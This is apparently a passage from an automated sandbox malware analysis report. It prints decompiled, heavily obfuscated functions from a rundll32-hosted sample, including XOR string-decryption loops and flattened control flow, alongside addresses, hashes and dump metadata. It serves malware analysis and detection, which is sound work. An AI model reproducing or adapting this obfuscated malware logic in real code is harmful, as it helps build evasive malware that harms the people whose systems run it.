				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00219AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002076F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00214F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00201C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00215a6b
0x00215a72
0x00215a74
0x00215a7b
0x00215a82
0x00215a89
0x00215a8b
0x00215a90
0x00215a98
0x00215a9b
0x00215aa2
0x00215aaa
0x00215aaf
0x00215abc
0x00215acf
0x00215ad4
0x00215ada
0x00215ae2
0x00215aea
0x00215af7
0x00215afa
0x00215b06
0x00215b0e
0x00215b11
0x00215b15
0x00215b1d
0x00215b2a
0x00215b2e
0x00215b36
0x00215b3b
0x00215b43
0x00215b4b
0x00215b53
0x00215b5b
0x00215b63
0x00215b6b
0x00215b73
0x00215b7b
0x00215b83
0x00215b8b
0x00215b93
0x00215b9b
0x00215ba3
0x00215bab
0x00215bb3
0x00215bbb
0x00215bc0
0x00215bc8
0x00215bd5
0x00215bd9
0x00215be1
0x00215be9
0x00215bf1
0x00215bf9
0x00215c01
0x00215c05
0x00215c0d
0x00215c15
0x00215c1d
0x00215c25
0x00215c25
0x00215c33
0x00215cd1
0x00215cd6
0x00215cac
0x00215cb0
0x00215cb8
0x00000000
0x00215cb8
0x00215c3f
0x00215c9d
0x00215ca5
0x00000000
0x00215cab
0x00215c43
0x00000000
0x00215d11
0x00215c4f
0x00215c57
0x00000000
0x00215c5d
0x00215c5d
0x00000000
0x00215c5d
0x00215d1c
0x00215d1c
0x00215d1c
0x00215c76
0x00215c7b
0x00215c7d
0x00215c83
0x00215c89
0x00000000
0x00215c89
0x00000000
0x00215c83
0x00215cdb
0x00215ce0
0x00215cea
0x00215cf3
0x00000000
0x00215cec
0x00215cec
0x00000000
0x00215cec
0x00000000
0x00215cf5
0x00215cf5
0x00000000

Strings

4., xrefs: 00215B7B
gG, xrefs: 00215A90

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: ba08059436ce8c44024ffe9a7ea366cf0ded37ab4b9948cef9c05c845057d5f5
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: 8B61AC71118742DBD768CF24C88985FBBE0FBD4318F100A1DF586962A0D7B98A99CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0020B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0020B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x21ca2c; // 0x495cc8
							_t82 = _t97 + 0x230; // 0x660053
							return E00206636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00213E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00210ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x0020b118
0x0020b11f
0x0020b127
0x0020b12c
0x0020b134
0x0020b13c
0x0020b144
0x0020b149
0x0020b151
0x0020b162
0x0020b16b
0x0020b183
0x0020b188
0x0020b18e
0x0020b196
0x0020b19e
0x0020b1b3
0x0020b1b4
0x0020b1b8
0x0020b1c0
0x0020b1c8
0x0020b1d0
0x0020b1d8
0x0020b1e0
0x0020b1e5
0x0020b1ed
0x0020b1f5
0x0020b1fd
0x0020b205
0x0020b20d
0x0020b215
0x0020b223
0x0020b227
0x0020b233
0x0020b233
0x0020b239
0x0020b2ce
0x0020b2d8
0x00000000
0x0020b2e3
0x0020b241
0x0020b25b
0x0020b262
0x00000000
0x0020b262
0x0020b249
0x00000000
0x00000000
0x0020b24b
0x0020b24b
0x0020b266
0x0020b272
0x0020b27a
0x0020b294
0x0020b2a8
0x0020b2a8
0x0020b2ac
0x0020b2ae
0x00000000
0x00000000
0x0020b299
0x0020b29d
0x0020b2a5
0x0020b2a5
0x0020b2a5
0x00000000
0x0020b2a5
0x0020b29f
0x0020b29f
0x0020b29f
0x0020b2a3
0x0020b2b2
0x0020b2b5
0x0020b2b5
0x00000000
0x0020b2b5
0x00000000
0x0020b2a3
0x00000000
0x0020b2b7
0x0020b2b7
0x0020b2b7
0x00000000

Strings

B, xrefs: 0020B266
W$, xrefs: 0020B215

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: a59e1afb1ddb7de8cc0731da332f96e88cb220c374ebb7e49b5853adb10869ea
Instruction ID: 4a935f06bba1840673ac79c0c5cd08bddcec47a7357dfd6ab88433fba8efaaf1
Opcode Fuzzy Hash: a59e1afb1ddb7de8cc0731da332f96e88cb220c374ebb7e49b5853adb10869ea
Instruction Fuzzy Hash: 454197715183028FD325CF20D58955FBBF1FBD8748F104A1EF489661A1D7B48A4A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 002131E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002131E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00201210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0021375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x002131f0
0x002131f3
0x002131fa
0x00213201
0x00213208
0x00213214
0x00213219
0x0021321e
0x00213225
0x0021322c
0x00213230
0x00213237
0x0021323e
0x00213245
0x0021324c
0x00213253
0x0021325a
0x00213261
0x00213264
0x0021326b
0x00213272
0x00213276
0x0021327d
0x00213281
0x00213288
0x0021328f
0x00213296
0x0021329d
0x002132a7
0x002132aa
0x002132b3
0x002132b7
0x002132be
0x002132c5
0x002132cc
0x002132d0
0x002132d7
0x002132de
0x002132e2
0x002132e9
0x002132f0
0x002132f7
0x002132fb
0x00213302
0x00213314
0x00213321
0x00213323
0x00213330
0x00213332
0x00213338
0x0021333e
0x00000000
0x00000000
0x00213340
0x00000000
0x0021333e
0x00213342
0x00213344
0x00213344
0x00213348
0x0021336d
0x00213372
0x0021337c

Strings

`Zye, xrefs: 00213201
J5, xrefs: 002132E2

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: f9bd5dc743b5520fee11e62500b39121be055abb46062ae53278db31aa73608d
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: 894114B1C1021DEBDF59CFA0C94A9EEBBB5FB14304F108199E111B62A0D7B94B94CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0021889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0021889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0020602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00208736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x002188a4
0x002188a9
0x002188aa
0x002188af
0x002188b7
0x002188ba
0x002188be
0x002188c2
0x002188ca
0x002188d2
0x002188da
0x002188e8
0x002188ed
0x002188f1
0x002188f9
0x00218901
0x0021890f
0x00218912
0x00218916
0x0021891e
0x00218922
0x00218925
0x00218927
0x0021892b
0x0021892f
0x0021893f
0x0021894a
0x00218959
0x0021895b
0x00218963
0x0021896a
0x0021897b
0x00218980
0x00218982
0x00218986
0x00218986
0x00218988
0x0021898b
0x00218990
0x00218998
0x0021899e
0x002189a2
0x002189ab
0x002189ac
0x002189b3
0x002189b7
0x002189bb
0x002189bb
0x002189c5
0x002189c5
0x002189d2

Strings

Q`, xrefs: 002188CA
{K, xrefs: 00218916

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: d1c355c8f86a3843f3d00c68545dd5485f9a61430c828ec1a9feee5f72057d2a
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: 5131CC72A087128FD314DF29C48446BF7E0FF88318F414B2DE489A7290DB74E90ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 0021878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0021878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0020602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00208736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00218799
0x0021879a
0x0021879f
0x002187a0
0x002187a5
0x002187ad
0x002187ad
0x002187b0
0x002187b8
0x002187c0
0x002187c8
0x002187d0
0x002187d8
0x002187e0
0x002187e8
0x002187f0
0x002187f8
0x002187fc
0x002187ff
0x00218801
0x00218805
0x00218809
0x00218819
0x00218824
0x00218832
0x00218834
0x0021883c
0x00218844
0x00218846
0x00218857
0x0021885c
0x0021885e
0x00218862
0x00218862
0x00218864
0x00218867
0x00218869
0x00218870
0x00218873
0x00218876
0x00218879
0x0021887f
0x00218880
0x00218883
0x00218887
0x00218887
0x00218890
0x00218890
0x0021889c

Strings

5Ur, xrefs: 002187D8
j, xrefs: 002187E0

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: c3ebc03a97926beb6172b1bc4b222d41db22456da3071999e43071eae08880e1
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: 3A318D72A093028FD314CF2DC88545BFBE0EF98714F454B5DE989A7252D734E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00219586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00219586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x21c860);
					_push(_v20);
					_t80 = E0021878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00216965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00212025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x0021958c
0x00219590
0x00219597
0x0021959e
0x002195a2
0x002195a6
0x002195ad
0x002195b4
0x002195bb
0x002195c2
0x002195cf
0x002195d6
0x002195dd
0x002195e6
0x002195ed
0x002195f0
0x002195f7
0x002195fe
0x00219605
0x0021960c
0x00219613
0x0021961a
0x00219621
0x00219628
0x0021962f
0x00219636
0x0021963d
0x00219644
0x0021964b
0x0021964f
0x00219656
0x00219661
0x00219668
0x0021966b
0x0021966f
0x00219679
0x0021967c
0x0021967e
0x00219681
0x00219686
0x0021968f
0x00219694
0x00219697
0x00219699
0x002196a1
0x002196ab
0x002196ad
0x002196ad
0x002196ba
0x002196c1
0x002196c8

Strings

4, xrefs: 00219628
I, xrefs: 002195A6

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: 86d6307ce2b83ff375b2acc2bec513b638dc49378e151d62192430be4ba14868
Instruction ID: 9b8e76ef49ec28fb517dd1fec4252bb719b32d541381db22c504233b346d9e83
Opcode Fuzzy Hash: 86d6307ce2b83ff375b2acc2bec513b638dc49378e151d62192430be4ba14868
Instruction Fuzzy Hash: 9F411271D0020AABEF04DFA1C94A6EEBBB0FB54314F208159D411B6290D3B99B95CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00207998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00207998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0020602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0021360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00212674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x0020799f
0x002079a3
0x002079a6
0x002079a9
0x002079aa
0x002079ad
0x002079b2
0x002079bb
0x002079bf
0x002079c6
0x002079cd
0x002079d4
0x002079db
0x002079e7
0x002079ec
0x002079f1
0x002079f8
0x002079ff
0x00207a06
0x00207a0d
0x00207a14
0x00207a19
0x00207a1c
0x00207a23
0x00207a2a
0x00207a31
0x00207a38
0x00207a3f
0x00207a46
0x00207a4a
0x00207a51
0x00207a58
0x00207a63
0x00207a66
0x00207a6a
0x00207a71
0x00207a84
0x00207a9d
0x00207aa2
0x00207aa8
0x00207ab0

Strings

[m1, xrefs: 002079D4
JX, xrefs: 00207A06

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: 55bf02c53d100e1160b79fe43e159514e092d31e663c231738582c57f0a606a5
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: 70310375900209FBCF58CFA5D94A8DEBBB6FF44314F20C059E9196A260D3799B64DF80

Uniqueness

Uniqueness Score: -1.00%

